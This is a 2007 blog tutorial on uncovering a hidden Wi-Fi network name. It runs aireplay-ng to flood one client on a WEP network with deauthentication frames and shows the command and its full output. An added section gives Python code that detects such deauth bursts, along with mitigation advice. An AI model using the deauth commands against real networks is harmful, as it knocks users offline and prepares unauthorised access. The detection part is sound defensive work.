Monday, November 26, 2007

Deauthing users to get the ESSID using aircrack-ng


Sometimes airodump-ng won't show you the ESSID of an access point (the AP is configured to hide it, so its beacons carry only the ESSID length). You'll need the ESSID before you can do the fake authentication attack.

root@segfault:/home/cg/eric-g# airodump-ng ath0 --bssid 00:14:BF:9D:BA:DA -c 11
CH 11 ][ Elapsed: 9 s ][ 2007-11-25 23:43

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:BF:9D:BA:DA   13  37       98       15    2  11  48  WEP  WEP         (length: 7)

BSSID              STATION            PWR  Lost  Packets  Probes

00:14:BF:9D:BA:DA  00:11:95:BD:77:79   -1     0        1
00:14:BF:9D:BA:DA  00:17:3F:74:80:D6    6    11        7


The solution is to deauth a client that is already on the network. When it reconnects, its probe and association requests carry the ESSID in the clear, and airodump-ng picks it up from there.


root@segfault:/home/cg/casa# aireplay-ng -0 10 -a 00:14:BF:9D:BA:DA -c 00:17:3F:74:80:D6 ath0
23:45:50 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:51 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:52 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:53 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:55 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:56 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:57 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:58 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:59 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:46:01 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]



Watch your airodump-ng output: the ESSID column should change from "(length: #)" to the actual ESSID.

CH 11 ][ Elapsed: 1 min ][ 2007-11-25 23:46

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:BF:9D:BA:DA   12  83     1093      122    5  11  48  WEP  WEP    OPN  general

BSSID              STATION            PWR  Lost  Packets  Probes

00:14:BF:9D:BA:DA  00:17:3F:74:80:D6    5     0      651
00:14:BF:9D:BA:DA  00:11:95:BD:77:79   -1     0        2

Our ESSID is "general".
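A defender-side check, added here as an example and not part of the original post: the ten deauth frames above, one per second to a single station, are a distinctive signature on the air. The Python below flags a deauth burst per (BSSID, station) pair over a sliding window, then reports the SSID that the deauthed station broadcasts in its probe request afterwards, which is exactly the leak this technique relies on. The frame record format, the threshold and the window are my assumptions, and the frame records are constructed from the MAC addresses in this post rather than taken from a real capture.

```python
"""Flag 802.11 deauthentication bursts and the SSID leak that follows them.

Added example, not from the original post or the aircrack-ng project. Frame
records are constructed below (a real deployment would feed them from a
monitor-mode capture); threshold and window are assumptions, not tool settings.
"""
from collections import defaultdict, deque

# 802.11 management-frame subtypes (frame type 0), per IEEE 802.11.
SUBTYPE_PROBE_REQ = 0x04
SUBTYPE_BEACON = 0x08
SUBTYPE_DEAUTH = 0x0C

# Tuning assumptions for this example: a real AP rarely sends more than a
# couple of deauths to one station per minute; a flood sends one per second.
DEAUTH_THRESHOLD = 5
WINDOW_SECONDS = 10.0


def detect_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Return one alert per (bssid, station) pair whose deauth count within a
    sliding `window`-second span reaches `threshold`. `frames` must be in time
    order; each is a dict with ts, type, subtype, addr1 (dst), addr2 (src), bssid.
    """
    recent = defaultdict(deque)  # (bssid, station) -> timestamps in window
    alerted = set()
    alerts = []
    for f in frames:
        if f["type"] != 0 or f["subtype"] != SUBTYPE_DEAUTH:
            continue
        # A spoofed deauth claims to come from the AP and targets the station.
        key = (f["bssid"].lower(), f["addr1"].lower())
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": key[0], "station": key[1], "count": len(q),
                           "first_ts": q[0], "last_ts": f["ts"]})
    return alerts


def ssids_revealed_after(frames, alerts):
    """For each alert, collect the SSIDs the deauthed station names in probe
    requests sent after the burst began: the hidden-ESSID leak provoked by it."""
    revealed = {}
    for a in alerts:
        ssids = [f["ssid"] for f in frames
                 if f["type"] == 0 and f["subtype"] == SUBTYPE_PROBE_REQ
                 and f["addr2"].lower() == a["station"]
                 and f["ts"] >= a["first_ts"] and f.get("ssid")]
        revealed[(a["bssid"], a["station"])] = ssids
    return revealed


# Constructed sample traffic: MACs are the ones shown in the post, timing
# mirrors the ten deauths above (one per second, two one-second gaps).
AP = "00:14:bf:9d:ba:da"
STA = "00:17:3f:74:80:d6"
OTHER_STA = "00:11:95:bd:77:79"
OTHER_AP = "02:00:00:00:00:01"   # constructed placeholder BSSID
BCAST = "ff:ff:ff:ff:ff:ff"


def frame(ts, subtype, addr1, addr2, bssid, ssid=None):
    return {"ts": float(ts), "type": 0, "subtype": subtype,
            "addr1": addr1, "addr2": addr2, "bssid": bssid, "ssid": ssid}


SAMPLE_FRAMES = (
    [frame(t, SUBTYPE_BEACON, BCAST, AP, AP) for t in range(0, 14, 2)]  # hidden SSID
    + [frame(t, SUBTYPE_DEAUTH, STA, AP, AP) for t in (0, 1, 2, 3, 5, 6, 7, 8, 9, 11)]
    + [frame(4.5, SUBTYPE_DEAUTH, OTHER_STA, OTHER_AP, OTHER_AP)]      # lone, benign
    + [frame(12.0, SUBTYPE_PROBE_REQ, BCAST, STA, BCAST, ssid="general")]
)
SAMPLE_FRAMES.sort(key=lambda f: f["ts"])

if __name__ == "__main__":
    found = detect_deauth_bursts(SAMPLE_FRAMES)
    for a in found:
        print(f"deauth burst: AP {a['bssid']} -> station {a['station']} "
              f"({a['count']} frames in {a['last_ts'] - a['first_ts']:.0f}s)")
    print("SSIDs leaked afterwards:", ssids_revealed_after(SAMPLE_FRAMES, found))
```

The alert fires on the fifth deauth inside the window, so a monitoring box sees it well before the client has reconnected. The single deauth from the other AP stays below threshold, which is the point of counting per (BSSID, station) pair rather than globally. On the mitigation side, 802.11w Protected Management Frames makes a station discard unprotected deauth frames, which is what removes this technique rather than a hidden ESSID, since the ESSID is still sent in the clear by every client that knows it.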

-CG
